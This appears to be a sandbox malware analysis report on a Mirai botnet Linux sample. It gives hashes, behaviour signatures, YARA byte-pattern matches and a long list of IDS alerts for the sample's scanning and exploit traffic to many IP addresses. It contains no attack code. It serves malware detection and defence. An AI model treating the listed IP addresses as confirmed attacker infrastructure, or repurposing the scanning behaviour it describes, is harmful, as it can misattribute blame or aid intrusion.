Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Cm1FNv3k5V.elf

Overview

General Information

Sample name:Cm1FNv3k5V.elf
renamed because original name is a hash value
Original sample name:ac4d02757f1d3dbc1204528910484d76.elf
Analysis ID:1381706
MD5:ac4d02757f1d3dbc1204528910484d76
SHA1:a6de6bd83303f41c4c6e413d216cd89af97d9316
SHA256:3efc0a994f39d73cfa1aad47431173a6628753fc5eed4906ad597c23682e5930
Tags:32elfintelmirai
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Sample is packed with UPX
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains only a LOAD segment without any section mappings
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1381706
Start date and time:2024-01-26 15:30:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Cm1FNv3k5V.elf
renamed because original name is a hash value
Original Sample Name:ac4d02757f1d3dbc1204528910484d76.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/0@0/0
  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/Cm1FNv3k5V.elf
PID:6229
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
unstable_is_the_history_of_universe
Standard Error:
  • system is lnxubuntu20
  • wrapper-2.0 (PID: 6239, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6240, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6241, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6242, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6243, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6244, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • xfconfd (PID: 6252, Parent: 6251, MD5: 4c7a0d6d258bb970905b19b84abcd8e9) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6231.1.0000000008048000.000000000805a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6231.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_268aac0bunknownunknown
      • 0x647f:$a: 24 18 0F B7 44 24 20 8B 54 24 1C 83 F9 01 8B 7E 0C 89 04 24 8B
      6231.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_0cb1699cunknownunknown
      • 0x6432:$a: DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 10 0F B7 02 83 E9 02 83
      6231.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_c8385b81unknownunknown
      • 0x9acc:$a: 8D 74 26 00 89 C2 83 ED 04 C1 E2 0B 31 C2 89 F0 C1 E8 13 89 D1
      6231.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Mirai_70ef58f1unknownunknown
      • 0xc25d:$a: 89 D0 8B 19 01 D8 0F B6 5C 24 10 30 18 89 D0 8B 19 01 D8 0F B6 5C
      • 0xc2dd:$a: 89 D0 8B 19 01 D8 0F B6 5C 24 10 30 18 89 D0 8B 19 01 D8 0F B6 5C
      Click to see the 21 entries
      Timestamp:192.168.2.23176.56.236.5856236802030092 01/26/24-15:32:30.860397
      SID:2030092
      Source Port:56236
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23176.97.247.24847918802025883 01/26/24-15:32:44.957952
      SID:2025883
      Source Port:47918
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.160.226.10542168802030092 01/26/24-15:31:58.618951
      SID:2030092
      Source Port:42168
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.14.115.11547294802025883 01/26/24-15:32:41.743983
      SID:2025883
      Source Port:47294
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2389.41.249.20560208802030092 01/26/24-15:32:44.750284
      SID:2030092
      Source Port:60208
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.231.232.247.1541192802030092 01/26/24-15:32:50.921301
      SID:2030092
      Source Port:41192
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2374.126.94.2437582802030092 01/26/24-15:31:51.555751
      SID:2030092
      Source Port:37582
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.51.104.1756314802025883 01/26/24-15:32:07.796229
      SID:2025883
      Source Port:56314
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.157.202.2638098802025883 01/26/24-15:31:43.792134
      SID:2025883
      Source Port:38098
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.228.56.19641006802025883 01/26/24-15:32:49.930063
      SID:2025883
      Source Port:41006
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.71.11.13052724802025883 01/26/24-15:31:52.747621
      SID:2025883
      Source Port:52724
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23206.189.92.21646586802030092 01/26/24-15:31:15.731033
      SID:2030092
      Source Port:46586
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.170.192.17952012802025883 01/26/24-15:31:30.586907
      SID:2025883
      Source Port:52012
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.20.25.840230802030092 01/26/24-15:32:01.591473
      SID:2030092
      Source Port:40230
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23183.90.233.9447038802030092 01/26/24-15:32:28.468365
      SID:2030092
      Source Port:47038
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23139.9.139.4446194802030092 01/26/24-15:31:53.004488
      SID:2030092
      Source Port:46194
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.255.164.2052728802030092 01/26/24-15:32:41.969791
      SID:2030092
      Source Port:52728
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2367.205.162.9947936802025883 01/26/24-15:31:27.619334
      SID:2025883
      Source Port:47936
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.203.117.8648890802030092 01/26/24-15:32:09.635936
      SID:2030092
      Source Port:48890
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23107.148.114.6555240802025883 01/26/24-15:31:18.915143
      SID:2025883
      Source Port:55240
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23186.39.102.20842590802030092 01/26/24-15:32:18.363395
      SID:2030092
      Source Port:42590
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2393.193.221.12535076802030092 01/26/24-15:32:19.779362
      SID:2030092
      Source Port:35076
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23196.51.30.12260800802030092 01/26/24-15:31:32.888328
      SID:2030092
      Source Port:60800
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.246.10.10051612802025883 01/26/24-15:32:19.110765
      SID:2025883
      Source Port:51612
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23174.141.213.15253818802030092 01/26/24-15:32:28.539246
      SID:2030092
      Source Port:53818
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2351.103.222.22957252802025883 01/26/24-15:31:47.419000
      SID:2025883
      Source Port:57252
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.23.145.11457594802030092 01/26/24-15:32:21.797565
      SID:2030092
      Source Port:57594
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.221.114.7953168802025883 01/26/24-15:32:35.546806
      SID:2025883
      Source Port:53168
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.201.221.1256156802025883 01/26/24-15:31:27.778518
      SID:2025883
      Source Port:56156
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23159.223.194.13638908802025883 01/26/24-15:31:49.498703
      SID:2025883
      Source Port:38908
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.232.77.8253902802030092 01/26/24-15:32:07.652853
      SID:2030092
      Source Port:53902
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.171.5.19058752802030092 01/26/24-15:32:28.234297
      SID:2030092
      Source Port:58752
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.51.135.2356360802025883 01/26/24-15:31:27.355741
      SID:2025883
      Source Port:56360
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.77.215.3954978802025883 01/26/24-15:31:33.317181
      SID:2025883
      Source Port:54978
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.92.244.18134746802030092 01/26/24-15:31:36.457097
      SID:2030092
      Source Port:34746
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.250.15.7359550802025883 01/26/24-15:31:28.086609
      SID:2025883
      Source Port:59550
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.101.158.18648658802030092 01/26/24-15:32:23.736327
      SID:2030092
      Source Port:48658
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23222.99.0.240348802025883 01/26/24-15:31:23.586367
      SID:2025883
      Source Port:40348
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.25.117.18253608802030092 01/26/24-15:32:25.541472
      SID:2030092
      Source Port:53608
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.186.223.7460054802030092 01/26/24-15:31:15.563497
      SID:2030092
      Source Port:60054
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2350.62.222.15055564802030092 01/26/24-15:31:49.642387
      SID:2030092
      Source Port:55564
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2365.0.126.4658778802030092 01/26/24-15:32:07.167336
      SID:2030092
      Source Port:58778
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23178.68.44.8346740802025883 01/26/24-15:31:01.295766
      SID:2025883
      Source Port:46740
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2395.101.219.23744662802025883 01/26/24-15:32:50.045255
      SID:2025883
      Source Port:44662
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2388.221.30.22749674802025883 01/26/24-15:32:47.925102
      SID:2025883
      Source Port:49674
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2324.225.30.2246538802030092 01/26/24-15:33:00.621045
      SID:2030092
      Source Port:46538
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.90.17758848372152835222 01/26/24-15:31:13.283422
      SID:2835222
      Source Port:58848
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2352.109.60.2139194802025883 01/26/24-15:32:25.609180
      SID:2025883
      Source Port:39194
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.20.38.150340802025883 01/26/24-15:31:35.517957
      SID:2025883
      Source Port:50340
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23111.51.104.23142970802030092 01/26/24-15:32:25.685688
      SID:2030092
      Source Port:42970
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.46.227.11555366802030092 01/26/24-15:32:50.641050
      SID:2030092
      Source Port:55366
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.21.165.21938134802030092 01/26/24-15:31:12.259896
      SID:2030092
      Source Port:38134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23153.121.71.21649318802025883 01/26/24-15:32:48.060193
      SID:2025883
      Source Port:49318
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2341.44.41.6749362372152835222 01/26/24-15:31:52.468921
      SID:2835222
      Source Port:49362
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2320.4.150.15357706802025883 01/26/24-15:32:01.649352
      SID:2025883
      Source Port:57706
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.244.93.14353284802030092 01/26/24-15:31:47.591942
      SID:2030092
      Source Port:53284
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2366.39.97.3749688802025883 01/26/24-15:32:18.363066
      SID:2025883
      Source Port:49688
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23143.244.211.11039042802030092 01/26/24-15:32:42.632872
      SID:2030092
      Source Port:39042
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23160.124.34.10244892802030092 01/26/24-15:32:23.676383
      SID:2030092
      Source Port:44892
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2372.246.165.14152866802025883 01/26/24-15:32:53.456854
      SID:2025883
      Source Port:52866
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23117.215.83.25541036802030092 01/26/24-15:31:52.153014
      SID:2030092
      Source Port:41036
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.33.209.7442186802030092 01/26/24-15:31:33.844677
      SID:2030092
      Source Port:42186
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.156.238.15959868802030092 01/26/24-15:32:18.244719
      SID:2030092
      Source Port:59868
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.87.6340596372152829579 01/26/24-15:32:52.520635
      SID:2829579
      Source Port:40596
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.43.226.25339442802025883 01/26/24-15:32:58.799927
      SID:2025883
      Source Port:39442
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.157.170.4946164802025883 01/26/24-15:31:18.152180
      SID:2025883
      Source Port:46164
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23101.33.8.22849264802030092 01/26/24-15:32:14.795065
      SID:2030092
      Source Port:49264
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2394.137.77.16234182802025883 01/26/24-15:32:30.876888
      SID:2025883
      Source Port:34182
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.32.126.3250944802030092 01/26/24-15:31:47.670538
      SID:2030092
      Source Port:50944
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.52.181.2843186802025883 01/26/24-15:31:49.542653
      SID:2025883
      Source Port:43186
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2346.232.249.23334358802025883 01/26/24-15:31:58.828965
      SID:2025883
      Source Port:34358
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23119.63.71.3550196802025883 01/26/24-15:31:33.480876
      SID:2025883
      Source Port:50196
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23123.136.83.1046740802030092 01/26/24-15:31:47.683671
      SID:2030092
      Source Port:46740
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2344.228.83.2351596802025883 01/26/24-15:31:36.754031
      SID:2025883
      Source Port:51596
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23197.246.45.20139650372152829579 01/26/24-15:32:01.755054
      SID:2829579
      Source Port:39650
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2323.213.247.10141460802025883 01/26/24-15:32:18.461409
      SID:2025883
      Source Port:41460
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.25.138.5739522802030092 01/26/24-15:31:52.670365
      SID:2030092
      Source Port:39522
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23142.166.236.25140872802025883 01/26/24-15:32:42.618573
      SID:2025883
      Source Port:40872
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.163.142.12346612802025883 01/26/24-15:33:01.661822
      SID:2025883
      Source Port:46612
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.77.110.7250552802030092 01/26/24-15:32:32.488738
      SID:2030092
      Source Port:50552
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23222.236.125.13744992802025883 01/26/24-15:31:44.173874
      SID:2025883
      Source Port:44992
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23195.42.149.6560862802025883 01/26/24-15:32:21.792089
      SID:2025883
      Source Port:60862
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.249.109.20043456802030092 01/26/24-15:32:58.550474
      SID:2030092
      Source Port:43456
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23138.2.243.10434394802025883 01/26/24-15:32:32.597404
      SID:2025883
      Source Port:34394
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.32.96.459814802030092 01/26/24-15:32:12.871882
      SID:2030092
      Source Port:59814
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2349.40.48.5248506802030092 01/26/24-15:31:27.006278
      SID:2030092
      Source Port:48506
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23217.243.251.11134724802030092 01/26/24-15:32:21.810147
      SID:2030092
      Source Port:34724
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23130.237.20.5237106802025883 01/26/24-15:31:30.884005
      SID:2025883
      Source Port:37106
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.118.223.18155768802030092 01/26/24-15:31:35.676752
      SID:2030092
      Source Port:55768
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23199.119.73.2160650802030092 01/26/24-15:32:21.518956
      SID:2030092
      Source Port:60650
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23191.82.36.1150732802030092 01/26/24-15:32:53.548901
      SID:2030092
      Source Port:50732
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.234.61.13656368372152829579 01/26/24-15:32:26.903685
      SID:2829579
      Source Port:56368
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23197.246.45.20139758372152829579 01/26/24-15:32:04.352629
      SID:2829579
      Source Port:39758
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2386.69.202.2657092802030092 01/26/24-15:32:25.701483
      SID:2030092
      Source Port:57092
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.180.111.20454250802030092 01/26/24-15:32:18.971768
      SID:2030092
      Source Port:54250
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.29.56.20453294802030092 01/26/24-15:31:35.873163
      SID:2030092
      Source Port:53294
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23100.27.4.9836268802030092 01/26/24-15:32:12.669266
      SID:2030092
      Source Port:36268
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.65.16.15349056802030092 01/26/24-15:31:58.620312
      SID:2030092
      Source Port:49056
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23204.54.40.18351026802025883 01/26/24-15:32:37.342241
      SID:2025883
      Source Port:51026
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.42.153.20256544802025883 01/26/24-15:32:53.498891
      SID:2025883
      Source Port:56544
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.53.232.13745522802025883 01/26/24-15:32:21.724705
      SID:2025883
      Source Port:45522
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23175.178.225.17141804802030092 01/26/24-15:32:40.067308
      SID:2030092
      Source Port:41804
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23154.38.87.5660742802030092 01/26/24-15:31:18.937002
      SID:2030092
      Source Port:60742
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2345.120.178.15140836802025883 01/26/24-15:32:50.723140
      SID:2025883
      Source Port:40836
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2347.107.144.24648474802025883 01/26/24-15:31:30.798057
      SID:2025883
      Source Port:48474
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2369.192.228.13047616802030092 01/26/24-15:32:28.904791
      SID:2030092
      Source Port:47616
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23168.76.87.954362802030092 01/26/24-15:31:37.382339
      SID:2030092
      Source Port:54362
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23119.45.129.20653062802025883 01/26/24-15:32:23.703500
      SID:2025883
      Source Port:53062
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23187.192.184.22845978802030092 01/26/24-15:32:18.308942
      SID:2030092
      Source Port:45978
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23198.48.58.4137276802030092 01/26/24-15:32:44.634580
      SID:2030092
      Source Port:37276
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.68.30.18244318802030092 01/26/24-15:31:44.329313
      SID:2030092
      Source Port:44318
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23134.65.235.16534716802025883 01/26/24-15:32:23.607670
      SID:2025883
      Source Port:34716
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.177.178.23848922802030092 01/26/24-15:31:52.755301
      SID:2030092
      Source Port:48922
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2338.238.84.5248178802025883 01/26/24-15:32:08.099021
      SID:2025883
      Source Port:48178
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.234.37.10551726802025883 01/26/24-15:32:41.768808
      SID:2025883
      Source Port:51726
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.72.37.3652384802025883 01/26/24-15:32:44.709070
      SID:2025883
      Source Port:52384
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23205.196.223.11843828802025883 01/26/24-15:31:47.595461
      SID:2025883
      Source Port:43828
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2370.122.67.9741000802030092 01/26/24-15:33:00.440639
      SID:2030092
      Source Port:41000
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.50.76.15939824802025883 01/26/24-15:31:35.677291
      SID:2025883
      Source Port:39824
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.128.234.233140802030092 01/26/24-15:31:41.689715
      SID:2030092
      Source Port:33140
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.65.143.7146658802025883 01/26/24-15:31:58.566964
      SID:2025883
      Source Port:46658
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.113.2943492372152829579 01/26/24-15:31:35.972751
      SID:2829579
      Source Port:43492
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23106.252.219.2838206802025883 01/26/24-15:31:54.023823
      SID:2025883
      Source Port:38206
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23125.56.205.13542420802030092 01/26/24-15:32:21.670698
      SID:2030092
